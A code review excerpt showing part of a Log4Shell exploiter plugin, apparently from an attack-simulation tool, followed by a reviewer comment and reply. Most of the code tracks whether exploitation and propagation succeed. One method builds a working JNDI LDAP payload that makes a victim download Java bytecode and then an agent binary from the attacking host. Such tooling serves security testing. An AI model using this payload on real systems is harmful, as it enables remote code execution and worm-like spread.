monkey/agent_plugins/exploiters/log4shell/src/log4shell_exploit_client.py

```diff
@@ -0,0 +1,216 @@
+        except Exception:
+            logger.exception("An exception was encountered while attempting to exploit Log4Shell")
+
+        return exploitation_success, propagation_success
+
+    @staticmethod
+    def _build_ldap_payload(target_host: TargetHost, ldap_port: NetworkPort) -> str:
+        interface_ip = get_interface_to_target(str(target_host.ip))
+        return f"${{jndi:ldap://{interface_ip}:{ldap_port}/dn=Exploit}}"
+
+    def _assess_exploit_status(
+        self,
+        target_host: TargetHost,
+        options: Log4ShellOptions,
+        agent_binary_downloaded: Event,
+        exploit_class_downloaded: Event,
+        timestamp: float,
+        interrupt: Event,
+    ) -> Tuple[bool, bool]:
+        propagation_success = False
+        exploitation_success = self._assess_exploitation(
+            target_host,
+            exploit_class_downloaded,
+            options.exploit_download_timeout,
+            timestamp,
+            interrupt,
+        )
+
+        if exploitation_success:
+            propagation_success = self._assess_propagation(
+                target_host,
+                agent_binary_downloaded,
+                options.agent_binary_download_timeout,
+                interrupt,
+            )
+        return exploitation_success, propagation_success
+
+    def _assess_exploitation(
+        self,
+        target_host: TargetHost,
+        exploit_class_downloaded: Event,
+        exploit_download_timeout: float,
+        timestamp: float,
+        interrupt: Event,
+    ) -> bool:
+        exploitation_success = Log4ShellExploitClient._wait_for_victim_to_download_java_bytecode(
+            exploit_class_downloaded, exploit_download_timeout, interrupt
+        )
+        if exploitation_success:
+            self._publish_exploitation_event(target_host, timestamp, True)
+        else:
+            error_message = "Timed out while waiting for victim to download the java bytecode"
+            logger.debug(error_message)
+            self._publish_exploitation_event(
+                target_host, timestamp, False, error_message=error_message
+            )
+
+        return exploitation_success
+
+    @staticmethod
+    def _wait_for_victim_to_download_java_bytecode(
+        exploit_class_downloaded: Event, exploit_download_timeout: float, interrupt: Event
+    ) -> bool:
+        return Log4ShellExploitClient._wait_for_event(
+            exploit_class_downloaded, exploit_download_timeout, interrupt
+        )
+
+    def _assess_propagation(
+        self,
+        target_host: TargetHost,
+        agent_binary_downloaded: Event,
+        agent_binary_download_timeout: float,
+        interrupt: Event,
+    ) -> bool:
+        propagation_success = Log4ShellExploitClient._wait_for_victim_to_download_agent(
+            agent_binary_downloaded, agent_binary_download_timeout, interrupt
+        )
+        self._publish_propagation_event(target_host, success=propagation_success)
```

Comment:
Where's the failure propagation event being published?

Reply:
Right there on line 157.